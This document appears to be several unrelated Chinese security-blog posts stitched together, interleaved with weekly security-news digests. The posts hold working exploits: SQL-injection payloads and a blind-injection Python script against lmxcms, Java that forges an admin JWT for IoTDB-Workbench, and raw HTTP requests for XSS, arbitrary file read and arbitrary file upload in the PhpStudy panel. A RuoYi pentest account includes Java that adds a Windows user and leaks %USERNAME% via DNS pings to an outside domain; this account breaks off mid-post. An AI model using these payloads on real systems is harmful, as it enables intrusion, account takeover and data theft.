前言 最近学习php代码审计，lmxcms很适合去学习代码审计，因为比较简单。 环境搭建 源码下载地址http://www.lmxcms.com/phpstudy+phpstorm,apache2.4.39+MySQL5.7.26,php5.3.29 网站首页 后台管理 搭建成功 框架配置 入口文件 config.inc.php配置文件 run.inc.php 初始化文件 入口 在Action.class.php中找到调用方法的 可以看出m参数是类名前缀，开头大写，a参数是方法名 那么我就知道该框架处理请求的格式如下 http://127.0.0.1/lmxcms1.4/admin.php?m=xx类名&a=xx方法 后台SQL注入 在bookaction.class.php 在这里可以看到这个id是可控的，于是进入getReply函数里看看 发现这里执行了SQL语句 在后面写个echo$sql方便看 因为正常输入没回显，采取报错注入 admin.php?m=Book&a=reply&id=1) and updatexml(0,concat(0x7e,user()),1)--+ 前台SQL注入 TagsAction.class.php中 看不出来$data['name']的值是如何来的，查看的p的方法 可以看到type=2的时候为GET传递，说明我们可以控制这个参数，继续看能不能利用 查看getNameData的声明 查看oneModel 查看oneDB 接着在这上面写个echo $sql； /index.php/?m=Tags&name=1 会跳404，但echo 出来了sql语句，说明这个过程是有sql语句执行的 这个时候继续利用报错函数执行试试 ' and updatexml(0,concat(0x7e,user()),1) --+ 发现是空白，连报错都没有，其实仔细看之前common.php里，有filter_sql方法 但是这里写了一个url解码的函数，且这个语句执行是在sql语句过滤执行的后面，那么我尝试二次编码注入 执行成功，但在1.41版本的修复了这个漏洞 这里用代码对比下可以明显看出来 前台留言SQL注入 在前台留言这里 随便提交一个，提交成功并没有显示，进后台看看 需要审核才能显示 审查源码 在BookAction.class.php中，发现POST传setbook后会进入checkdata函数 里面是验证前台数据并且过滤了html代码并且有filter_sql 过滤了sql语句常用函数，在这里就不能用二次编码绕过了，因为这里没写url解码函数 查看addmodel 查看addDB 即使我们有二次注入的思路，但这个需要管理员审核才能看到回显 随便测试一个看看 在数据库中显示为 可以看出这个ischeck是判断是否显示在前台的，那么我们进行注入，把ischeck修改为1就可以回显在前端了 POST提交 setbook=1&name=1&content=1&time,ischeck)VALUES((select/**/version()),'1','','','127.0.0.1','1679301152','1')#=1 前台布尔盲注 searchaction.class.php serchmodel countModel countDB 在这里写入echo $sql;方便尝试注入 利用这些参数进行注入 可以利用tuijian这个参数注入，或者也可以用renmen看构造问题 SELECT count(1) FROM lmx_product_data WHERE time > 1647768137 ANDremen=1 AND (title like '%a%') ORDER BY id desc 执行如上sql语句，这里同样也进行了filter_sql函数过滤，且没有url编码不能向第一个那样二次编码绕过，具体可在p方法里找 index.php?m=search&a=index&keywords=a&mid=1&remen=1%20or%20(if(ascii(substr(database(),1,1))=0x6c,1,0))--+ GET/lmxcms1.4/index.php?m=search&keywords=b&mid=1&tuijian=id%20or%20(if(ascii(substr(database(),1,1))=0x6,1,0));%23 这里0x6c对应的是l 回显长度为8425,随便改个参数，返回包长度变为5403 用remen参数回显为8422 写一个简单的python脚本就可以测出值 import requests\flag=""\url="http://127.0.0.1/lmxcms1.4/index.php?m=search&a=index&keywords=a&mid=1&remen=1%20or%20(if(ascii(substr(database()&&&&,{},1))={},1,0))%23"\for i in range(1,7):\for j in range(65,122):\res=requests.get(url.format(i,hex(j)))\if len(res.text)>7000:\flag=flag+chr(j)\print(fla 任意文件读取&任意文件写入 文件读取函数freadfopenfilefile_get_contents搜索file_get_contents然后找file_get_contents函数和参数代码段， 在file.class.php getcon方法里 file_get_contents具有读取文件内容的功能，这里$path变量我们要看怎么来的，于是查看getcon的用法 在TemplateAction.class.php中调用了getcon 查看$dir变量怎么来的 该页面在admin目录下，那么进入后台根据页面名称传参调用尝试任意文件读取 lmxcms1.4/admin.php?m=Template&a=editfile 传$dir 还可以读取数据库文件 同样这里还可以进行任意文件写入 可以在这个页面直接进行修改或者写入 分别是文件名称跟内容，file_put_contents函数写入 任意文件删除 在BackdbAction.class.php中搜索unlink 这里看到filename可控，查看delone file/back下创建一个文件测试1.txthttp://localhost/lmxcms1.4/admin.php?m=backdb&a=delbackdb&filename=1.txt 通过../../实现任意文件删除 再次访问就需要安装了 命令执行 在admin/AcquisiAction.class.php中搜索eval 可以看出$eval函数的参数$temdata是$this->model->caijiDataOne($_GET['cid']);跟进 可以看出执行了sql语句，通过跟进ci_data_tab发现 查询的是cj_data表 在cj_data表中插入phpinfo(); lmxcms1.4/admin.php?m=Acquisi&a=showCjData&id=1&cid=1&lid=1 总结 这次是对phpmvc框架的审计的尝试，思路是从危险函数入手，寻找可控参数变量，尝试利用触发，白盒+黑盒一起尝试可能会效果更佳，感觉自己有好多地方不足，很多都是参考网上的或者别人的思路才能完成审计实现，希望能对大家有所帮助，不足之处希望大家能够批评指正。

1、丰田遭严重用户信息泄露事件，数据泄露已长达一年半之久 https://www.freebuf.com/news/361832.html 全球知名汽车制造公司丰田（TOYOTA）遭遇了严重的用户信息泄露事件。安全研究人员发现，黑客通过攻击丰田意大利数字营销自动化和分析软件服务提供商 Salesforce Marketing Cloud，从而获得了海量的用户数据，且至今为止数据泄露已有一年半之久。 2、三星表示将于下月彻底修复 Exynos 调制解调器漏洞 https://www.ithome.com/0/682/535.htm 谷歌 Project Zero 安全团队日前报告，在三星调制解调器中发现了 18 个漏洞。三星社区经理今天在美国社区上发帖，表示三星在今年 3 月份发布的补丁中，已经修复了 6 个漏洞中的 5 个，剩余 1 个漏洞会在下月彻底修复。 3、新的MacStealer macOS 恶意软件窃取 iCloud 数据和密码 https://thehackernews.com/2023/03/new-macstealer-macos-malware-steals.html MacStealer恶意软件使用 Telegram 作为命令和控制 (C2) 平台，主要影响运行 macOS 版本 Catalina 以及之后运行在 M1 和 M2 CPU 上的设备。 4、恶意 Python 包使用 Unicode 支持来逃避检测 https://securityaffairs.com/144070/malware/malicious-python-package-uses-unicode.html 研究人员在 PyPI 上发现了一个恶意包，它使用 Unicode 来逃避检测，同时窃取敏感数据。 5、威胁分子滥用AI生成的Youtube视频传播窃取信息的恶意软件 https://www.4hou.com/posts/mXLO 最近出现了一种视频以AI生成的角色为主角的趋势，出现在多种语言和平台（Twitter、Youtube和Instagram）上，提供招聘细节、教育培训、宣传材料等。 6、新的IcedID变种用于传播其他恶意软件 https://www.bleepingcomputer.com/news/security/new-icedid-variants-shift-from-bank-fraud-to-malware-delivery/ 研究人员发现新的 IcedID 变种没有通常的在线银行欺诈功能，而是专注于在受感染的系统上安装更多恶意软件。根据 Proofpoint 的说法，自去年年底以来，三个不同的威胁参与者在七次活动中使用了这些新变体，重点是进一步传播有效载荷，最多的是勒索软件。 7、研究人员报告针对欧洲企业的恶意软件DBatLoader https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses Zscaler 的 ThreatLabz 研究团队发现了一个涉及 DBatLoader（也称为 ModiLoader）的新活动，该活动专门通过网络钓鱼电子邮件针对欧洲企业。恶意软件有效负载通过具有SSL 证书的 WordPress 网站分发。在整个活动中，研究人员观察到威胁行为者在网络钓鱼电子邮件中使用了多种技术，通过 DBatLoader / ModiL 8、最新调查显示澳大利亚非银行贷款机构数据泄露量远超此前报道 https://www.govinfosecurity.com/latitude-financial-admits-14m-customer-details-breached-a-21543 澳大利亚非银行贷款机构 Latitude Financial 周一表示，黑客事件影响的人数远远超过最初披露的人数。该公司称黑客窃取了大约 790 万个澳大利亚和新西兰的驾照号码、53000 个护照号码、不到 100 名客户的月度财务报表，以及另外 610 万条记录，包括数据库中的姓名、地址、电话号码和出生日期，该数据库包含至少可追溯到 2005 年的信息。 9、微软推出基于GPT-4的Security Copilot工具，用于自动化网络安全 https://www.securityweek.com/microsoft-puts-chatgpt-to-work-on-automating-cybersecurity/ 微软推出了一款名为“Microsoft Security Copilot”的AI安全分析工具，它是由OpenAI的最新GPT-4模型驱动的，并将使用来自 Redmond 企业部署和 Windows 端点的大量遥测信号的数据进行训练。该工具可用于自动化事件响应和威胁猎杀任务，帮助防御者更好地识别恶意活动并快速采取行动。 10、电信巨头Lumen遭受勒索软件攻击并披露第二起事件 https://securityaffairs.com/144113/hacking/lumen-suffered-ransomware-attack.html Lumen Technologies发现了两起网络安全事件，其中包括一次勒索软件攻击。该公司已经向证券交易委员会提交了文件，并表示这些事件不会对其业务、运营或财务结果产生重大不利影响。Lumen通知执法机构并报告了受影响的客户，正在进行调查以确定入侵的程度。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

漏洞简介 　　 　　影响版本 0.13.0 <= 漏洞版本 < 0.13.3 　　漏洞主要来自于 iotdb-web-workbench IoTDB-Workbench是IoTDB的可视化管理工具，可对IoTDB的数据进行增删改查、权限控制等，简化IoTDB的使用及学习成本。iotdb-web-workbench 中存在不正确的身份验证漏洞。 环境搭建 　　我们发现在 Releases 中已经删除到只剩最新版本，所以我们从 commits 中查找历史提交记录来搭建环境。 　　 　　 　　下载下历史版本的源码，下载之后利用 docker 搭建环境。 　　需要修改一下 docker-compose.yml 将其中挂载数据库文件修改为： volumes:      - ./backend/src/main/resources/sqlite/iotdb.db:/sqlite/iotdb.db   　　直接在根目录下执行 docker-compose up -d 虽然镜像编译成功，但是执行后一直启动不成功，通过 docker logs 查看日志信息。 　　 　　发现后台的 jar 包没有编译成功拷贝到容器内，所以先进入 backend 执行 mvn package 编译 jar 。 默认情况下都是依赖于 aliyunmaven 但是很奇怪这次编译时会提示无法从 aliyun 中下载文件，所以将 maven 的 settings.xml 配置文件关于 aliyun 的相关依赖注释掉，就可以编译成功。 　　编译成功之后，再次执行发现了问题仍然存在，还是相同的错误类型。后来无论怎么修改 backend 目录下对应的 Dockerfile 文件，仍然无法成功。最后发现是因为没有修改根目录中的 docker-compose.yml ，下载的仍然是有问题的镜像，没有去调用编译本地的镜像。 　　 　　进到 backend 目录下 修改 Dockerfile 文件 删除掉 "${JAVA_MEM_OPTS}" 　　执行 docker build -t test:v1 . 编译镜像。 　　 　　编译之后，将 docker-compose.yml 中的 apache/iotdb-web-workbench:0.13.0-backend 替换为 test:v1 　　再执行 docker-compose up -d 　　 　　访问 http://127.0.0.1:8081/#/login 　　 　　环境如此就搭建好了，但是在实际中利用的话，还是建议不要使用 docker ，而是单独编译前端后端。 漏洞复现 　　构造数据包请求保存用户时 　　 　　提示没有登录。 　　创建一个 java 项目： import io.jsonwebtoken.Jwts; import io.jsonwebtoken.SignatureAlgorithm; import java.util.Date; public class iotdb_CreateToken {    private static String secret =            "HSyJ0eXAiOiJKV1QasdfffffffSd3g8923402347523fffasdfasgwaegwaegawegawegawegawetwgewagagew"                    + "asdf23r23DEEasdfawef134t2fawt2g325gafasdfasdfiLCJhbGciOiJIUzI1NiJ9";    public static String generateToken(String username) {        Date now = new Date();        //   Calendar instance = Calendar.getInstance();        //   instance.add(Calendar.HOUR_OF_DAY, 24);        Date expireDate = new Date(new Date().getTime() + (1000 * 60 * 60 * 10));        return Jwts.builder()               .setHeaderParam("type", "JWT")               .setSubject(0 + "")               .setIssuedAt(now) // 签发时间               .claim("userId", 1)               .claim("name", username)               .setExpiration(expireDate) // 过期时间               .signWith(SignatureAlgorithm.HS512, secret)               .compact();   }    public static void main(String[] args) {        String token = generateToken("admin");        System.out.println(token);   } } 　　 　　将生成的 Token 加入到之前的数据包中。 　　 　　创建用户成功，尝试登录。 POST /api/login?name=test&password=123456 HTTP/1.1 Host: 127.0.0.1:8081 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/json Content-Length: 4 { } 　　 　　登录成功。 漏洞分析 　　 org.apache.iotdb.admin.filter.TokenFilter#preHandle 　　 　　在 TokenFilter 中 JJwtTool.getClaimsByToken(authorization); 从请求头中获取 token 并解析匹配 　　 org.apache.iotdb.admin.controller.UserController#login 　　 　　我们发现 token 的来源是因为登录成功后会根据用户来生成 token JJwtTool.generateToken(user) 　　 org.apache.iotdb.admin.tool.JJwtTool#generateToken 　　 　　生成 Token 的相关参数均是可控的，所以我们可以自己构造。

1、研究人员发布APT37新恶意软件传播技术分析 https://thehackernews.com/2023/03/scarcrufts-evolving-arsenal-researchers.html ScarCruft（也称为APT37）是一个高级持续性威胁组织，近期使用Microsoft CHM文件传播新的恶意软件。研究人员指出，该组织在不断改进其技术以规避检测。除了恶意软件分发之外，ScarCruft还通过网络钓鱼攻击多个电子邮件和云服务。 2、GhostSec黑客组织针对卫星接收器发起攻击 https://blog.cyble.com/2023/03/27/ghostsec-targeting-satellite-receivers/ 卫星和太空行业的组织和设备已经成为国家关键基础设施的重要组成部分，也面临着日益增加的网络威胁。黑客和勒索软件组开始瞄准该行业，并可能利用漏洞和数据泄漏来获得未经授权的访问和干扰通信。在最近被发现以卫星接收器为目标的GhostSec等黑客组织的参与下。CRIL 研究人员认为，公共和私人实体合作以保护对航天工业的威胁已变得至关重要。 3、Emotet利用伪造的W-9税单进行钓鱼攻击 https://www.bleepingcomputer.com/news/security/emotet-malware-distributed-as-fake-w-9-tax-forms-from-the-irs/ Emotet恶意软件最新的钓鱼攻击伪装成W-9税单，利用带有嵌入式脚本的Microsoft OneNote文件进行分发。一旦感染，恶意软件将窃取受害者的电子邮件，并安装其他恶意软件。安全工程师建议用户不要打开来自未知发送者的电子邮件，避免启用Word附件中的宏。 4、Apple 修复了影响旧款设备的 CVE-2023-23529 零日漏洞 https://securityaffairs.com/144114/hacking/cve-2023-23529-apple-zero-day.html Apple 发布了安全补丁的更新，解决了旧款 iPhone 和 iPad 上被积极利用的 CVE-2023-23529 WebKit 零日漏洞。 5、新的 MacStealer macOS 恶意软件出现在地下网络犯罪中 https://securityaffairs.com/144099/malware/macstealer-macos-malware.html Uptycs 研究人员团队发现了一种新的 macOS 信息窃取程序，称为 MacStealer，允许操作员从受感染的系统中窃取 iCloud Keychain 数据和密码。 6、Twitter 源代码在Github上泄露 Cyberkendra 网站披露，推特最近遭遇了一次罕见的源代码泄露事件，一份法律文件显示推特部分源代码在网上曝光。 https://www.freebuf.com/news/361710.html 7、Pwn2Own 2023落幕，冠军斩获超50万美元奖金 本届Pwn2Own于3月22日-3月24日在加拿大温哥华举办，参赛者主要围绕汽车、企业应用程序和通信、服务器、虚拟化和本地特权升级 (EoP)等类别进行挑战。最终，本届比赛的冠军队伍花落Synacktiv，他们以绝对优势斩获53万美元奖金和53个Master of Pwn 积分，还获赠了一辆特斯拉Model 3。 8、研究人员分享利用语言风格向AI语言模型植入隐蔽后门的攻击 https://securityboulevard.com/2023/03/usenix-security-22-xudong-pan-mi-zhang-beina-sheng-jiaming-zhu-min-yang-hidden-trigger-backdoor-attack-on-nlp-models-via-linguistic-style-manipulation/ 这篇论文研究了深度神经网络（DNN）在自然语言处理（NLP）领域中的后门（木马）攻击漏洞。此类攻击会修改DNN，使其在攻击者指定的输入下表现出预期的行为（即触发器）。先前的研究使用特别添加的单词/短语作为触发器模式（即 9、研究人员披露活跃的新勒索组织Dark Power https://www.darkreading.com/vulnerabilities-threats/dark-power-ransomware-extorts-10-targets-less-than-a-month 新生的勒索软件组织横空出世，在不到一个月的时间里攻破了至少10个组织。该小组被 Trellix 研究人员命名为“Dark Power”——在大多数方面与其他组织一样的勒索软件团体。该勒索软件加密速度快并采用 Nim 编程语言编写。 10、Bitter APT黑客组织针对中国核能行业 https://www.bleepingcomputer.com/news/security/bitter-espionage-hackers-target-chinese-nuclear-energy-orgs 最近发现一个被追踪为“Bitter APT”的网络间谍黑客组织以中国核能行业为目标，使用网络钓鱼电子邮件感染带有恶意软件下载程序的设备。Bitter 是一个疑似南亚黑客组织，以亚太地区能源、工程和政府部门的知名组织为目标。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

漏洞简介 　　PhpStudy国内12年老牌公益软件，集安全、高效、功能与一体，已获得全球用户认可安装，运维也高效。 支持一键LAMP、LNMP、集群、监控、网站、数据库、FTP、软件中心、伪静态、云备份、SSL、多版本共存、Nginx反向代理、服务器防火墙、web防火墙、监控大屏等100多项服务器管理功能。小皮 Windows web 面板存在存储型 xss 漏洞，结合后台计划任务即可实现 RCE。 影响版本 　　因为我一边测试一边写文章，但是我发现下载下的新版本的已经添加了过滤，但是并没有更新日志。 环境搭建 　　从官网下载 小皮 windows 面板安装包 　　https://www.xp.cn/windows-panel.html 　　 　　 　　安装完成后会有一个初始信息文本，记录了小皮面板的登录地址以及账号密码。 　　 　　 漏洞复现 绕过随机码 　　我们注意到小皮面板后台默认开放在 9080 端口，后台登录 url 地址中会存在一个随机码，不添加随机码时返回信息为 404。 　　 　　在程序中全局搜索和 404 相关的字样定位到 service/httpServer/Workerman/WebServer.php 　　 　　当添加请求头 X-Requested-With: XMLHttpRequest 就可以绕过随机码。 　　 　　‍ 存储型 XSS 　　我们在用户登录处的用户名插入弹窗 XSS 代码 验证是否存在漏洞。 <script>alert("xss")</script> 　　 　　 　　利用正确的用户名密码登录查看。 　　 　　我们发现成功的触发了存储型 xss。 　　我们查看登录时的数据包 　　 　　 service/app/account.php 　　 　　 \Account::login 　　 　　 \Socket::request 　　 　　‍ 　　将信息保存起来，登录平台后会自动获取一次日志信息。 　　 　　 service/app/log.php 　　 　　‍ 后台计划任务 　　我们注意到后台有计划任务模块。 　　 　　所以可以直接通过构造计划任务实现 RCE。 　　添加任务 -> 添加 shell 脚本 -> 构造 shell 脚本内容 -> 执行 shell 脚本 　　 　　‍ 　　 　　 　　 　　 　　 　　成功执行命令。 　　结合原本的存储型 XSS，可以直接获取管理员的 Cookie 值然后实现后台计划任务命令执行，或者直接通过 js 文件实现类似 CSRF + 后台计划任务命令执行。 任意文件下载 　　构造数据包 GET /service/app/files.php?type=download&file=L3Rlc3QudHh0 HTTP/1.1 Host: 192.168.222.139:9080 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://192.168.222.139:9080/C292CA Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=9c53f8f8c903d9412a3f0211 Connection: close 　　file 的值是 base64 编码后的 /test.txt 成功读取文件内容。 　　 　　 　　service/app/files.php 　　 　　文件下载通过 get 获取文件名，通过 base64 解码获取，没有校验，所以可以实现任意文件下载。 任意代码执行 　　构造数据包 POST /service/app/files.php?type=download_remote_file HTTP/1.1 Host: 192.168.222.139:9080 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://192.168.222.139:9080/C292CA Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=9c53f8f8c903d9412a3f0211 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 95 url=aHR0cDovLzE5Mi4xNjguMjIyLjE6ODAwMC8xLnR4dA==&download_to_file_folder=&newfilename=testing.txt 　　url 是 base64 编码的 http://192.168.222.1:8000/1.txt python2 -m SimpleHTTPServer 8000   #在本地开启 http 服务 　　 　　 　　 　　 service/app/files.php 　　 　　通过 url 获取远程的下载地址，download_to_file_folder 指定下载文件文件夹，newfilename 指定保存文件的文件名。 任意文件上传 　　构造数据包 POST /service/app/files.php?type=file_upload HTTP/1.1 Host: 192.168.222.139:9080 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://192.168.222.139:9080/C292CA Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=9c53f8f8c903d9412a3f0211 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0tFhmmng2vwxftT Content-Length: 288 ------WebKitFormBoundaryE0tFhmmng2vwxftT Content-Disposition: form-data; name="file_path" / ------WebKitFormBoundaryE0tFhmmng2vwxftT Content-Disposition: form-data; name="file"; filename="testing1.txt" Content-type: image/jpg qweqwe ------WebKitFormBoundaryE0tFhmmng2vwxftT-- 　　 　　 　　 service/app/files.php 　　 任意文件上传二 　　构造数据包 POST /service/app/files.php?type=save_file_contents HTTP/1.1 Host: 192.168.222.139:9080 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://192.168.222.139:9080/C292CA Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=9c53f8f8c903d9412a3f0211 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 58 file_path=/&file_name=test2.txt&txt_file_contents=qwerqwer 　　 　　 　　 service/app/files.php 　　 　　根据通过 post 传入的值 file_path 指定保存文件目录 file_name 指定文件保存名字 txt_file_contents 指定文件保存内容，未作任何过滤，可实现任意文件上传。 任意文件上传三 　　构造数据包 POST /service/app/databases.php?type=file_add HTTP/1.1 Host: 192.168.222.139:9080 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://192.168.222.139:9080/C292CA Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=9c53f8f8c903d9412a3f0211 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0tFhmmng2vwxftT Content-Length: 312 ------WebKitFormBoundaryE0tFhmmng2vwxftT Content-Disposition: form-data; name="parent_dir" ../../../../../../../../ ------WebKitFormBoundaryE0tFhmmng2vwxftT Content-Disposition: form-data; name="file"; filename="testing2.txt" Content-type: image/jpg qweqwe ------WebKitFormBoundaryE0tFhmmng2vwxftT-- 　　 　　 　　 service/app/databases.php 　　 漏洞修复 　　在登录处添加了校验。 　　 　　对传入的文件名的长度进行校验，同时对传入的字符串进行了 htmlspecialchars 处理。 　　‍

1、GitHub SSH私钥意外在公共库中短暂暴露 https://www.bleepingcomputer.com/news/security/githubcom-rotates-its-exposed-private-ssh-key/ GitHub 私钥意外在一个公共的代码库中暴露。GitHub 表示尽管私钥暴露的时间很短，但谨慎起见还是决定更换密钥。GitHub 发布了一份博客帖子，详细介绍了所采取的措施以及新的公钥指纹。GitHub 表示不会因此泄露任何客户信息，并呼吁用户更新 ~/.ssh/known_hosts 文件以避免中间人攻击。此外，虽然 GitHub 更换了私钥，但一些软件项目和文档仍在使用已撤销的 SSH 指纹。 2、WordPress的WooCommerce Payments插件存在严重漏洞 https://thehackernews.com/2023/03/critical-woocommerce-payments-plugin.html WordPress的WooCommerce Payments插件存在一个严重安全漏洞，可能允许攻击者未经授权访问受影响的商店并完全接管网站。该漏洞影响版本为4.8.0至5.6.1。WordPress已发布补丁并自动更新使用受影响软件版本的网站。目前尚未发现该漏洞被积极利用的证据，但用户需要更新到最新版本并检查是否有新添加的管理员用户，并更改所有管理员密码和API密钥。 3、CISA发布检测微软云环境中恶意活动的免费工具 https://www.helpnetsecurity.com/2023/03/24/malicious-activity-microsoft-cloud/ 在 Microsoft Azure、Azure Active Directory (AAD) 和 Microsoft 365 (M365) 云环境中搜索恶意活动的网络防御者可以使用新的开源解决方案：Untitled Goose Tool。它由美国网络安全和基础设施安全局 (CISA) 发布，允许用户导出和查看日志、警报、配置等。 4、OpenAI称ChatGPT对话记录混乱是由Redis错误引发 https://thehackernews.com/2023/03/openai-reveals-redis-bug-behind-chatgpt.html 本周早些时候，OpenAI的ChatGPT服务暴露了部分用户的个人信息和对话记录，该公司在周五透露，这是由于Redis开源库中的一个错误所导致的，该错误源于redis-py库，可能导致连接损坏并从数据库缓存返回意外数据，进而使一些用户从聊天记录侧边栏查看了其他用户对话的摘要。 5、英国国家打击犯罪局伪装DDoS服务商渗透网络犯罪市场 https://www.hackread.com/nca-cybercrime-market-fake-ddos-sites/ 国家打击犯罪局 (NCA) 开展了一项诱捕行动，利用虚假的 DDoS 站点渗透网络犯罪市场，以实施犯罪打击行动。NCA 将所有这些网站设计得看起来很真实，给访问者一种所提供的工具和服务可以让他们发起 DDoS 攻击的印象。 6、 研究人员实现通过超声波控制智能设备 https://www.bleepingcomputer.com/news/security/inaudible-ultrasound-attack-can-stealthily-control-your-phone-smart-speaker/ 美国大学研究人员开发了一种名为NUIT的新型攻击，可以对使用语音助手的设备进行静默攻击。NUIT攻击的主要原理是智能设备的麦克风可以响应人耳无法听到的超声波，因此攻击可以在使用传统扬声器技术的同时最大程度地减少暴露风险。 7、宝洁公司因GoAnywhere零日漏洞泄露数据 https://www.bleepingcomputer.com/news/security/procter-and-gamble-confirms-data-theft-via-goanywhere-zero-day/ 宝洁（Procter & Gamble）公司确认遭遇数据泄露，幸未影响客户数据。P&G表示，攻击者未获得员工的财务或社会保障信息，但确实窃取了一些数据。P&G公司停用了Fortra的GoAnywhere安全文件共享服务。 8、Microsoft发布Windows截图工具安全更新 https://www.bleepingcomputer.com/news/microsoft/microsoft-pushes-oob-security-updates-for-windows-snipping-tool-flaw/ 微软为Windows 10、11的截图工具发布了紧急安全更新，以修复Acropalypse隐私漏洞。该漏洞会导致剪裁后的数据留在原始文件中，从而有可能导致敏感信息泄露。微软发布了CVE-2023-28303漏洞的安全更新，建议用户立即安装。 9、Vice Society声称攻击了波多黎各水务机构 https://securityaffairs.com/144022/hacking/puerto-rico-aqueduct-and-sewer-authority-attack.html 波多黎各沟渠与污水管理局（PRASA）遭受网络攻击，现正与美国FBI和CISA进行调查。攻击者获取到客户和员工信息，但该局重要基础设施的运营未受影响。攻击者身份暂时未知，但Vice Society勒索软件组将该机构添加到其受害者名单中，并泄露了个人护照、驾照和其他文件。 10、攻击者利用USB触发物理炸弹攻击新闻机构 https://www.malwarebytes.com/blog/news/2023/03/5-news-stations-receive-explosive-usb-stick-letter-bombs 近日，厄瓜多尔的五家不同新闻机构收到一些包裹，包含一个USB盘。其中一名记者在将其插入电脑后，该设备就爆炸了，导致新闻室人员受伤，至少其中一个装置装有“军用炸药”。通常黑客通过发送感染了恶意软件的USB盘给受害者来进行攻击，而这次更加体现了USB安全管理的重要性。目前，执法部门正在调查此事件。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

前言 最近客户开始hw前的风险排查，让我们帮他做个渗透测试，只给一个单位名称。通过前期的信息收集，发现了这个站点： 没有验证码，再加上这个图标，吸引了我注意： 从弱口令开始 若依默认口令为admin/admin123，结果真的直接进了。 管理员权限，直接上工具探测一下是否有若依的几个漏洞： 工具链接：https://github.com/thelostworldFree/Ruoyi-All 还得是运气啊！原本想着直接用这个工具一键穿的，但是奈何没利用过若依的洞，这个工具也不会使用。后续去查看了几篇文章，需要上传jar包，该漏洞可通过定时任务去调用执行jar包。 文章地址：https://blog.csdn.net/FY10033/article/details/126206890 然后坑来了。按照教程去实践，发现怎么样也无法执行漏洞。以下是java代码：  public AwesomeScriptEngineFactory() {\   try {\     Runtime.getRuntime().exec(\"net user test test@123 /add\");\     Runtime.getRuntime().exec(\"ping tttt.ogjxcqvtbf.dnstunnel.run\");\     Runtime.getRuntime().exec(\"ping  %USERNAME%.ogjxcqvtbf.dnstunnel.run\");\   }catch (IOException e) {\      e.printStackTrace();\    }\  } 还得从shiro入手 尝试了一下午后，想想算了，看看有没有别的洞吧。刚好文章里面有写到，ruoyi的shiro存在默认密钥，结果一尝试，还真的存在。（Ps：这边有个坑，我用文章里面提到的LiqunKit去尝试，无法执行命令。后续用了shiro_attack成功命令执行） 然后通过shiro写入内存马： 对内存马感兴趣的，可以看下这两篇文章： http://www.manongjc.com/detail/64-jmklbsfdbhdslrw.htmlhttps://blog.csdn.net/MachineGunJoe/article/details/118088350但是可惜，这是一台云主机，整个内网就一台主机。很多人可能看到esc，就不想再打了。不过我还是去翻了一下文件夹，把数据库账号也拉下来。 这个项目很奇怪，我找到的项目路径下全是jar包，我都怀疑这个是不是web目录。在基础信息里面找到了路径： catalina.home =C:\Users\Administrator\AppData\Local\Temp\2\tomcat.937421519914311975.808 但是进入该路径下，发现没文件，不知道是不是权限不够。 可以看到这边只限制127.0.0.1的ip访问，这就很尴尬，所以这边我使用ligolo代理3306出来，成功进行连接： 工具链接：https://github.com/FunnyWolf/ligolo 其实也尝试过添加用户，但是貌似被拦截了。原本想用哥斯拉的内存马进行一键提权的，但是不知道为什么，哥斯拉的内存马一直连接不上。有大佬懂的，还望不吝赐教。 再战定时任务 